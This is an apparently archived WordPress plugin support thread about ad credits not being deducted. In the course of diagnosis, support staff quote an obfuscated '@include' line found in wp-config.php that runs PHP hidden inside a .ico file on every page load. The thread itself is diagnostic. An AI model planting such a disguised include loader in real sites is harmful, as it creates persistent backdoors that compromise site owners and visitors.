Skip Navigation

[Resolved] Classified ad package doesn't reduce number of ad credits anymore.

This support ticket is created 3 years, 5 months ago. There's a good chance that you are reading advice that it now obsolete.

This is the technical support forum for Toolset - a suite of plugins for developing WordPress sites without writing PHP.

Everyone can read this forum, but only Toolset clients can post in it. Toolset support works 6 days per week, 19 hours per day.

This topic contains 10 replies, has 2 voices.

Last updated by Christian Cox 3 years, 5 months ago.

Assigned support staff: Christian Cox.


I am trying to: reduce ad credits by placing an ad from 'My Account' ad package

Link to a page where the issue can be seen: hidden link

I expected to see: Link to a post-form that reduces my number of available ads

Instead, I got: Link to a post-form that does not reduce my number of available ads


previously, this worked fine. Not sure if I changed something accidentally in the post-form


Hi, I'll take a look. Can I install the Duplicator plugin on your site and make a site clone? This will help me run tests locally without affecting the live site. If you approve, I'll get started.


Yes, please. Thanks!


Still investigating, but are these files in your root directory malicious, or did you put them there?
...and so on, there are around 19 or 20 of these obfuscated php files with seemingly random filenames.


I have no idea on those php files. Nothing that I've added. Can you please remove them and, hopefully, that will correct the issue.


I'm not comfortable doing that, because it has nothing to do with Toolset. If you look in your wp-config.php file, you'll see some code at the top of the file:

@include "\057hom\1451/d\162ive\167a3/\160ubl\151c_h\164ml/\151nc/\155odu\154es/\05618d\143b17\070.ic\157";

That translates to something like this:
@include "/backup-1532868133-wp-includes/Requests/Auth/.43a4c6ae.ico"

Check that file path on your site:
Looks like an innocuous backup of the wp-includes folder. But if you dive in you'll find a windows ICO file that contains PHP script:
So this malicious code in your wp-config.php file is being run every time someone visits the site, which in turn runs the code hidden in this .ico file. You've got a hacked site here, and that's about all I can be sure of right now.

I suggest you start here:


I understand - thanks for the info!


site is clear of hacked issues per Quterra. Just placed an ad from a package but the package does not reduce.

Ads from packages are placed via post form "add new premium ad"


Okay thanks, I will ask my 2nd tier support team to take a closer look. I'll let you know what I find out.


Okay the code that was written for the Classifieds plugin requires that you use the Form with the slug "add-another-premium-ad". However on your site, it looks like you are using a different Form, one with the slug "add-new-premium-ad". The code used to update ad credits will not work with any Form except "add-another-premium-ad". You have two options here. You can remove the add-new-premium-ad Form and replace it with the add-another-premium-ad Form, or you can copy all the information from the add-another-premium-ad Form, paste it into the add-new-premium-ad form, and then delete the add-another-premium-ad Form. Then you can change the slug of the add-new-premium-ad Form to be add-another-premium-ad.